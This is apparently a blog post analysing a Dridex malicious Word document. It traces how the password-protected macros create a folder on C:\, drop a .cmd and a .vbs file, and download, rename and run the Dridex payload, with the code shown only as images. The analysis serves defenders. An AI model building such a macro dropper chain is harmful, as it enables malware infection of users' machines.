Dridex (2020-01-15) – Malicious Document Analysis

This document is… interesting, to say the least. Not only does it drop numerous files, but we also get to learn various facts about supermodels from the 1990’s!

I’m not joking. Onto the analysis.


Document Prep

First things first, we see from the original email that the document itself has a password of 258. That itself is no big deal. When we open the document, we’ll just be prompted for the password and can get past that easily enough. We should make sure that we remove the password. Otherwise, we will be unable to extract the macros.

I’ll also jump ahead for a moment and say that the macros in the document are password protected. So feel free to edit the vbaProject.bin in a hex editor at this time. See the blog post here for how to do that.


Macro Analysis

Upon initial look at the macros, we can see that one of them is significantly larger than the others.dridex04.png

Looking at macro modNormalTheme, we can see that there is a massive amount of junk code. Here is one example:dridex05.png

But starting with Sub autoopen(), we can see some other things start to happen:

dridex06.png

On line 4423, we can see that a new folder called Colorfonts32 gets created on the C:\ and a number of files get created there. Of note, we notice that file B4D9D02119.cmd is significantly larger than the others.

dridex07.png

Inspecting that file shows us that buried amongst the junk code, we a file named visitcard.vbs tossed into a variable named Robocar. Throughout the rest of this file, various commands get placed in there via the echo command.

dridex08.png

dridex09.png

Buried further in that file, we see a wscript command calling up the above .vbs file, a URL that downloads putty.bin, writes it to C:\Colorfonts32, renames it secpi15.exe, and then starts it.

dridex10.png

dridex11.png

Upon analysis from any.run, the downloaded file is identified as dridex.

Thanks for reading!


Wait, I though there would be supermodels!

When executing the macro, we see a function named TestProgressBar. That function calls up a form named ElganteSample which contains a picture like so:

dridex12.png

After ‘Enable Content’ is clicked, the above picture will pop up and various captions will be displayed. Captions such as…

dridex13.png

And why is that in here? I haven’t a clue.

Thanks again!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s